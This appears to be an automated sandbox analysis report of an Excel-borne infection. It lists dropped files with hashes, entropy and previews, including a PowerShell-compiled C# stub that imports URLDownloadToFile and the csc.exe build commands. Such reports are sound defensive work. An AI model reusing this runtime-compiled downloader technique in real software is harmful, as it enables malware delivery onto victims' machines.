                                                                                                                                                                                MD5:5143D715F94DE0D33E778B33ECF0B0D5
                                                                                                                                                                                SHA1:1DFEC5C9C03648E50A35B9C1B86A1A7393C4FD64
                                                                                                                                                                                SHA-256:E266A80FAD311B06F955849BA26A83B5FAA2F8A1949A22AC3B61C9CC3C50ECB8
                                                                                                                                                                                SHA-512:93BA0654EA573C677ABE6F94C3D9B41338996059F38B2BDD974B16D3874CCCA62C96479963462548E1444E81ECB1BA90CF2744E4ABBE77DFBA6FBB4027C0CEF8
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:L...gvDg.............debug$S........H...................@..B.rsrc$01........X.......,...........@..@.rsrc$02........P...6...............@..@........P....c:\Users\user\AppData\Local\Temp\b53lag2c\CSCFF6E95784C84671B5586A4811C47.TMP.....................R....j..S..........4.......C:\Users\user\AppData\Local\Temp\RES3100.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.5.3.l.a.g.2.c...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.
                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Nov 25 13:07:05 2024, 1st section name ".debug$S"
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1328
                                                                                                                                                                                Entropy (8bit):3.9634086106272104
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:24:HNge9EA2LMBLdHlwKdNWI+ycuZhNGEakSfJPNnqSqd:tL2LMBpmKd41ulGEa3frqSK
                                                                                                                                                                                MD5:7BE07EA9A5052B6BFC7902A79F319DB8
                                                                                                                                                                                SHA1:76653E21CEE380B3E93E28DE7C56F17A59A19908
                                                                                                                                                                                SHA-256:CE1DC0B2B02EC51696AF7E20FD58898C40E868D8561B565E3BC5816845382AA7
                                                                                                                                                                                SHA-512:EE449BF32F38D95F9AD609627A2C50D57ADB30F53B6436CC95184D890532A20D1AB3A6D5EC5DE182DF67DADD6BF105D3D3C2150718E6C2FAB80DC6E105F03439
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:L...yvDg.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........Q....c:\Users\user\AppData\Local\Temp\ovqlooon\CSCADDA0BE83C5E4E17A4EF3CEA725DA.TMP...................h6.z.c0. ...............4.......C:\Users\user\AppData\Local\Temp\RES77DF.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...o.v.q.l.o.o.o.n...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:U:U
                                                                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:1
                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                File Type:MSVC .res
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):652
                                                                                                                                                                                Entropy (8bit):3.106206409297211
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryWkak7YnqqVpPN5Dlq5J:+RI+ycuZhNskakSVpPNnqX
                                                                                                                                                                                MD5:DFE100111F9152D89A97D7CE6A008F53
                                                                                                                                                                                SHA1:7847FDD597309A023272453723FB24EAE0E65090
                                                                                                                                                                                SHA-256:93111017ADD4A4D2B1262F1F04B8B664730EB5412C2556138A90A02930BE39C5
                                                                                                                                                                                SHA-512:09EDF7587A80796641C90AAA11F15A81398674DFD85B6E45BC85E609CC86D65D5D3FB14A66B845E8FC7C0B8D8D14FDCB1700894500DBDD425E379866C5DDAF93
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.5.3.l.a.g.2.c...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...b.5.3.l.a.g.2.c...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (370)
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):487
                                                                                                                                                                                Entropy (8bit):3.777856663326396
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:V/DsYLDS81zuNWv/0qRQvFMGHBQXReKJ8SRHy4HqlVzJZLmmlO2FQy:V/DTLDfucvevMXfHqPL2y
                                                                                                                                                                                MD5:41644CC7D79A640ACE6C0FF4910F08CA
                                                                                                                                                                                SHA1:0D5B30A377678B86A4CEAD014E9242C0736E8F3C
                                                                                                                                                                                SHA-256:81FE034A935E362D6704748F50CB1EEE0190456D5A63BB393155D3BA11B5A304
                                                                                                                                                                                SHA-512:C7DF30FE1B121BD4ACCFE50586C523A6EA66811B66AB5A0643CEBF11A093058B09422254088D7380EF02735ACC81B3D28E522FE481B7AF0EC6288DBDC1248F38
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:.using System;.using System.Runtime.InteropServices;..namespace sildbFN.{. public class uAItGV. {. [DllImport("urLmOn", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr maKoAch,string sMNQofrlQE,string hZtVXNOP,uint TLqPzmU,IntPtr PtL);.. }..}.
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):369
                                                                                                                                                                                Entropy (8bit):5.2455310879497565
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fXmzxs7+AEszIP23fX1yA:p37Lvkmb6KzOWZEoYA
                                                                                                                                                                                MD5:6A1EA56BF8A06283F88E0EB832698754
                                                                                                                                                                                SHA1:041E2A4493DF3FDCADD426280738ACC4A57EEE54
                                                                                                                                                                                SHA-256:8908A8A565B5FC0A2D694DE21D430C767D8BE19B92F19060BFB9ED7064B0F58F
                                                                                                                                                                                SHA-512:33EB158B7DE45A950AB63E686915DC2B64188829E68F6DE3AD8104CFAD89AF648F233DF9B8F7B5A26FA17409B088B574BB1FF1805820C8BC1773E46494F325FC
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\b53lag2c\b53lag2c.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\b53lag2c\b53lag2c.0.cs"
                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):3072
                                                                                                                                                                                Entropy (8bit):2.84578987995177
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:24:etGS+PBG5eAdF8sYgkOlqXC2QP9VytkZfiw/MEWI+ycuZhNskakSVpPNnq:6VsAde4l2QPFJj/Mn1ulNa3xq
                                                                                                                                                                                MD5:438F8B78C3D0FB3F4137240C76E799D5
                                                                                                                                                                                SHA1:3AEDA063D1B2E06F9D5B6493353EBFD1FC06E899
                                                                                                                                                                                SHA-256:7E4C0D04A4E10C31C7666BF34AE8C38FB854E7A528C95473215EDA33947F255D
                                                                                                                                                                                SHA-512:DF472AD277AEE644265DB46D196B9F88D4BE427ED9D3F1EB35517D8B23B4A910A67253CC4411EAA9C6C9F9ACD1223DCBFCCC23030AE33ECC7C1828FD8D714E31
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                                                                                                                                Category:modified
                                                                                                                                                                                Size (bytes):866
                                                                                                                                                                                Entropy (8bit):5.341594780087453
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:24:AId3ka6KzPEoiKaMD5DqBVKVrdFAMBJTH:Akka60PEoiKdDcVKdBJj
                                                                                                                                                                                MD5:D5D26614DD723A270BBF57EC7505396A
                                                                                                                                                                                SHA1:6C0FC93F6269B09ECE2EE122EF7E7E48D65F4B07
                                                                                                                                                                                SHA-256:794D724BD1ED655377110A6F695CC685CEA083F6A9810FD772D80BC7B398CED2
                                                                                                                                                                                SHA-512:56C4C916BCB86E86E049A509EDAF440C1E4B107E7C011E2FC973059BB79BA13D04BA1615F3228155919081BE9C4C66EC2EBA31626D074C27021754CDF069AF0A
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\b53lag2c\b53lag2c.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\b53lag2c\b53lag2c.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x168c031a, page size 32768, DirtyShutdown, Windows version 6.1
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):21037056
                                                                                                                                                                                Entropy (8bit):1.1360818498582117
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:24576:u91U91o2I+0mZ5lEHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:u9EXaLuHqqEXwPW+RHA6m1fN
                                                                                                                                                                                MD5:A3C7B9CAD326B73864738C75BF73669E
                                                                                                                                                                                SHA1:5F34BB2A8F3670DD0AC4E2FF04CBE1E32C88B7A9
                                                                                                                                                                                SHA-256:21DA23EAFEABC860E56D4F71507AEB463D42F6D83AF0B60874E54AB44BE13553
                                                                                                                                                                                SHA-512:5BC227A503CC1046392B39F866B35A9345802C4E0DC6EA9F050A99C6A72F6C31BB925BE95A1F43C703CA1F7FA497CDD240FEA5A05872A76D74EFA2967279D9B9
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:Qn:Qn
                                                                                                                                                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:..
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:U:U
                                                                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:1
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:U:U
                                                                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:1
                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                File Type:MSVC .res
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):652
                                                                                                                                                                                Entropy (8bit):3.0744178664546213
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grysQhak7YnqqfQGPN5Dlq5J:+RI+ycuZhNGEakSfJPNnqX
                                                                                                                                                                                MD5:CA6836957A9E6330EFA320BC948B96D6
                                                                                                                                                                                SHA1:6AA69531002AFC94F897623DEDFD64020CCAECC6
                                                                                                                                                                                SHA-256:F257BD957AEED3EABF823AEDA41EC9E1F4B2FACBD2A0BBC0A97AAB830C6D7CC3
                                                                                                                                                                                SHA-512:1253AD0DE107E0D21DF8482E2B8CCDA8A94D82E6D9413D6C045F57ACC357284C3552052A7C95F27D89C0DEDC7BF2FE7356C878E9E1D76D45B430E176BA84CD75
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...o.v.q.l.o.o.o.n...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...o.v.q.l.o.o.o.n...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (370)
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):487
                                                                                                                                                                                Entropy (8bit):3.777856663326396
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:V/DsYLDS81zuNWv/0qRQvFMGHBQXReKJ8SRHy4HqlVzJZLmmlO2FQy:V/DTLDfucvevMXfHqPL2y
                                                                                                                                                                                MD5:41644CC7D79A640ACE6C0FF4910F08CA
                                                                                                                                                                                SHA1:0D5B30A377678B86A4CEAD014E9242C0736E8F3C
                                                                                                                                                                                SHA-256:81FE034A935E362D6704748F50CB1EEE0190456D5A63BB393155D3BA11B5A304
                                                                                                                                                                                SHA-512:C7DF30FE1B121BD4ACCFE50586C523A6EA66811B66AB5A0643CEBF11A093058B09422254088D7380EF02735ACC81B3D28E522FE481B7AF0EC6288DBDC1248F38
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:.using System;.using System.Runtime.InteropServices;..namespace sildbFN.{. public class uAItGV. {. [DllImport("urLmOn", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr maKoAch,string sMNQofrlQE,string hZtVXNOP,uint TLqPzmU,IntPtr PtL);.. }..}.
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):369
                                                                                                                                                                                Entropy (8bit):5.18098215257252
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23feWh+zxs7+AEszIP23feWZ:p37Lvkmb6Kz2W8WZEo2WZ
                                                                                                                                                                                MD5:06B33E3C0F3B4B3FA462CB6249C02436
                                                                                                                                                                                SHA1:44C0B6A2173F2152EA08CE72D257705DE3141C37
                                                                                                                                                                                SHA-256:E80ED657E06C7E2BBEC01E9A36875D491A1A3E8BC476203EFA1F51512D584759
                                                                                                                                                                                SHA-512:1B6760F79B4FBDEE138E8E4EEBF2B46C8E624AF7D6C69D4CADFEC4C024A920E731E4B17FF14890DEABEF1C6DE87DA67923AE3F22A6F30F41423D36B1EC0D43B9
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ovqlooon\ovqlooon.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ovqlooon\ovqlooon.0.cs"
                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):3072
                                                                                                                                                                                Entropy (8bit):2.830312001635949
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:24:etGScPBG5eAdF8sYgkOlqXLC8QP9VytkZfAvmAEMEWI+ycuZhNGEakSfJPNnq:6DsAde4lgQPFJGmAEMn1ulGEa3frq
                                                                                                                                                                                MD5:83C89B39F0F9AD579FD1644FF88FB86C
                                                                                                                                                                                SHA1:516E6741915BF018643225E6B87C9A279349F2E0
                                                                                                                                                                                SHA-256:90FDF2A55E624D69BE9386869E5B4825BF117204BC8D37B980EB668CD5CA6A15
                                                                                                                                                                                SHA-512:00FA9DE02BFB208F4F416D75E3EFB71BC07963C394A353CF2A9F9636F8C543D4FDE2C0E168AEB0B56FC3E1DD9D42B2A69E952A73FDD4CDD2A89BD18F602922DF
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...yvDg...........!.................#... ...@....... ....................................@.................................`#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~...... ...#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................6./.....}.....}.......................................... =.....P ......O.........U.....].....h.....q.....y...O.....O...!.O.....O.......!.....*.......=.......................................&..........<Module>.ov
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                                                                                                                                Category:modified
                                                                                                                                                                                Size (bytes):866
                                                                                                                                                                                Entropy (8bit):5.305526067229823
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:24:AId3ka6Kz2IEo2HKaMD5DqBVKVrdFAMBJTH:Akka602IEo2HKdDcVKdBJj
                                                                                                                                                                                MD5:6A7E399796E3F438256D22559335C8E2
                                                                                                                                                                                SHA1:87FCE6D965B9859379727B15BD42BFB6D3D2EF0C
                                                                                                                                                                                SHA-256:331C8A5DE63BA2F398730A78A780604BE868F4F1754006F8818327E2DBEB0AB9
                                                                                                                                                                                SHA-512:401D97D7D85C111D2BD668D925D07E3C690F1E863E80EE437B2177EB0CB81314071CFE668203ED1F1E9889B1EB5D884161830EF99D949CF419BE3D72C046139A
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ovqlooon\ovqlooon.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ovqlooon\ovqlooon.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:U:U
                                                                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:1
                                                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Nov 25 11:48:53 2024, Security: 1
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):204800
                                                                                                                                                                                Entropy (8bit):7.826178543203008
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3072:x1JTHBq6U/6xVsMKgpNc+ZwuURRTd9STL0bfC3LajCe7r7Ssb28HQiR:x1lHBMixiMK6G+ZFrTkC3LajCsfA8
                                                                                                                                                                                MD5:B8DC65936F8AD62DCA4D99AB246CE0F6
                                                                                                                                                                                SHA1:48503B23EEB5DCA59B701AC0CCE37E35564DF669
                                                                                                                                                                                SHA-256:A5317E6F58448EF456E0EC03901CE3EA646FC18F6CB46682CAD2BDE8E7E11DA7
                                                                                                                                                                                SHA-512:CF9EB926C3EB63CE402BCB819788CAF3864CB4FD13CEA9347D513E7538CA39649CF5C3C80578457816575D74154D1483BAFEA4D5A079CDA352409239D07BF410
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):512
                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3::
                                                                                                                                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with very long lines (378), with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):142260
                                                                                                                                                                                Entropy (8bit):3.6754384164261458
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:1536:kWgwsSmx5nYZjuEoBz/Ib3qBgnM4zBkzLSCL/egt5pzWGwm:pBuYZjubgL6gnMmSfSCLGgt5pyGwm
                                                                                                                                                                                MD5:3EB10EDFAAA09C17D81B1DA5B336684B
                                                                                                                                                                                SHA1:13D5D78340551543986CB92DAB870D552287745B
                                                                                                                                                                                SHA-256:C5F2960ED833EABA3A8B95A0F4253EFBE1A7FD96E303D1731EBCB7E0E54623C8
                                                                                                                                                                                SHA-512:7758740C6663B603F4DB1BDCEA22F89F5C307E93754164C3CBC7F8FCCE7CF7B9E2A251F07522EC6DB8488C4D7FC78BCE6A83B47EFE57436E2E1ACF88F7FE9930
                                                                                                                                                                                Malicious:true
